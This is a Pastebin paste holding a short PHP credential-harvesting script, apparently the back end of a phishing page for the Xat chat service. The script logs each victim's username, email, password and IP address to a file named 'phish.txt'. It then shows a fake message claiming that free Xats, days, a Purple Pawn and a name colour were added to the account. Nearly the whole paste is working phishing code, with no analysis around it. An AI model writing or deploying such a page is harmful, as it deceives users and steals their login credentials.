Advertisement
Guest User

Untitled

a guest
Aug 9th, 2017
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. <font face="Arial" size="2" color="black">
  2. <?php
  3. $username = $_POST['username'];
  4. $email = $_POST['email'];
  5. $password = $_POST['pass'];
  6. $ip = $_SERVER['REMOTE_ADDR'];
  7. $logs = "phish.txt";
  8. $ld = fopen($logs, 'a') or die(" ");
  9. $data = "Xat Username: $username, Email: $email, Password: $password, IP: $ip \n";
  10. fwrite($ld, $data);
  11. echo "<h2>Xats, Days, Purple Pawn and Namecolor added!</h2>";
  12. echo "<font size=2>999 Xats/Days and Purple Pawn + Name Color as been added to your account.</font>";
  13. ?>
  14. </font>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement